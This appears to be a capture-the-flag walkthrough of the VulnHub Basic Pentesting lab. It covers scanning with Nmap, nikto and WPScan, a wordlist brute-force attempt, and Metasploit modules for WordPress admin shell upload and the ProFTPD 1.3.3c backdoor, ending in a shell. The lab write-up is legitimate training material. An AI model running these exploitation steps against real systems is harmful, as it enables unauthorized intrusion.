VulnHub Basic Pentesting
Good day to all.
Many of you know about Pentest, someone even dealt with him, and someone just heard and would like to feel like a mini specialist in this field. A long time ago, or maybe not long ago, a laboratory dedicated to just that appeared on VulnHub .
ACT I - Setup
For work, I used Kali Linux and VirtualBox, and of the laboratory itself, of course.
Now we need to connect 2 cars. To make it simple: open cmd and go to the directory where VirtualBox is installed and prescribe the settings for VboxManage
cd C:\Program Files\Oracle\VirtualBox
C:\Program Files\Oracle\VirtualBox>VBoxManage.exe dhcpserver add --netname internet --ip 10.0.1.1 --netmask 255.255.255.0 --lowerip 10.0.1.2 --upperip 10.0.1.200 --enable>
Now in the Kali and Pentest settings we put the name of the network that we wrote in cmd
ACT II - In the beginning
Check if Kali Linux sees our lab.
We see the connection to eth0 . Now we need to find out the specific IP of our machine. For this, we will use the notorious Nmap program
IP of our laboratory 10.0.1.2
ACT III - Basic Pentesting
After Nmap scanned our virtual network, we saw that 3 ports were open in the laboratory:
- 21 - ftp
- 22 - ssh
- 80 - http
We are trying to connect to port 80. To do this, open the browser (in my case, it's FireFox)
Fine! The site is working. Let's check which directories it hides from us. To do this, we will use the wonderful nikto program and look at the result.
OSVDB-3092: /secret/: This might be interesting
The secret directory should be interesting. Let's find out what she is hiding
It looks, of course, at 3 out of 10, but it can all be fixed, in the name of beauty and convenience, of course.
The most attentive, probably already guessed, and nikto with Nmap hinted us more than once.
- Uncommon header 'link' found, with contents: <http://vtcsec/secret/index.php/wp-json/> - Nmap scan report for vtcsec (10.0.1.2)
Let's add a name in hosts, through terminal:
# echo "10.0.1.2 vtcsec" >> /etc/hosts
Now we are ready to see all the beauty of the site
Now, like a bloodhound, we look at all the directories of the site, poke at everything that is poked and in the end we find out that the site is written in WordPress. Yes - yes nikto told us before that, but we are not looking for easy ways.
Let's Use WordPress Vulnerability Scanner - WPScan
# wpscan --url http://10.0.1.2/secret/
WordPress Security Scanner by the WPScan Team
Sponsored by Sucuri - https://sucuri.net
@ WPScan , @ ethicalhack3r, @erwan_lr, pvdl, @ FireFart
[+] URL: http://10.0.1.2/secret/
[+] Started: Thu Mar 8 17:47:02 2018
[!] The WordPress 'http://10.0.1.2/secret/readme.html' file exists exposing a version number
[+] Interesting header: LINK: http://vtcsec/secret/index.php/wp-json/; rel="https://api.w.org/"
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: http://10.0.1.2/secret/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.0.1.2/secret/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.0.1.2/secret/wp-includes/
[+] WordPress version 4.9 (Released on 2017-11-15) identified from advanced fingerprinting, meta generator, links opml, stylesheets numbers
[!] 6 vulnerabilities identified from the version number
[i] Fixed in: 4.9.1
[!] Title: WordPress 1.5.0-4.9 — RSS and Atom Feed Escaping
[i] Fixed in: 4.9.1
[!] Title: WordPress 4.3.0-4.9 — HTML Language Attribute Escaping
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9 — 'newbloguser' Key Weak Hashing
[i] Fixed in: 4.9.1
[!] Title: WordPress 3.7-4.9.1 — MediaElement Cross-Site Scripting (XSS)
[i] Fixed in: 4.9.2
[!] Title: WordPress <= 4.9.4 — Application Denial of Service (DoS) (unpatched)
[+] WordPress theme in use: twentyseventeen — v1.4
[+] Name: twentyseventeen — v1.4
| Latest version: 1.4 (up to date)
| Last updated: 2017-11-16T00:00:00.000Z
| Location: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/
| Readme: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/README.txt
| Style URL: http://10.0.1.2/secret/wp-content/themes/twentyseventeen/style.css
| Referenced style.css: http://vtcsec/secret/wp-content/themes/twentyseventeen/style.css
| Theme Name: Twenty Seventeen
| Theme URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a…
| Author: the WordPress team
| Author URI: https://wordpress.org/
[+] Enumerating plugins from passive detection…
[+] No plugins found
[+] Finished: Thu Mar 8 17:47:06 2018
[+] Requests Done: 89
[+] Memory used: 37.828 MB
[+] Elapsed time: 00:00:03
Hmmm, let's try to list all the usernames with the --enumerate u flag .
# wpscan --url http://10.0.1.2/secret/ --enumerate u
There is only one user. So, you can try to tweak the password.
# wpscan --url http://10.0.1.2/secret/ --wordlist /usr/share/wordlists/dirb/big.txt --threads 2
Unfortunately, our brutus was not successful, but we saw something interesting - an error in the login admin and password admin.
I'll have to try exploit through Metasploit
ACT IV - Admin is coming
First you need to configure Metasploit .
#/etc/init.d/postgresql start # msfdb init
Let's get started!
Need to find our exploit. We use the search command
# search admin
From the list, wp_admin_shell_upload suits us
We launch it and we carry out setup
# msf>use exploit/unix/webapp/wp_admin_shell_upload # msf>set username admin # msf>set password admin # msf>set rhost 10.0.1.2 # msf>set targeturi /secret
It should be like this:
Go to the browser and go under admin / admin
ACT V - I see backdoor
Now try to access the terminal. To do this, again we need Metasploit.
# msf>use exploit/unix/ftp/proftpd_133c_backdoor
We carry out setup
# msf>set rhost 10.0.1.2
Launch! ( you can use exploit instead of run )
Tadaaam, we got access to the console.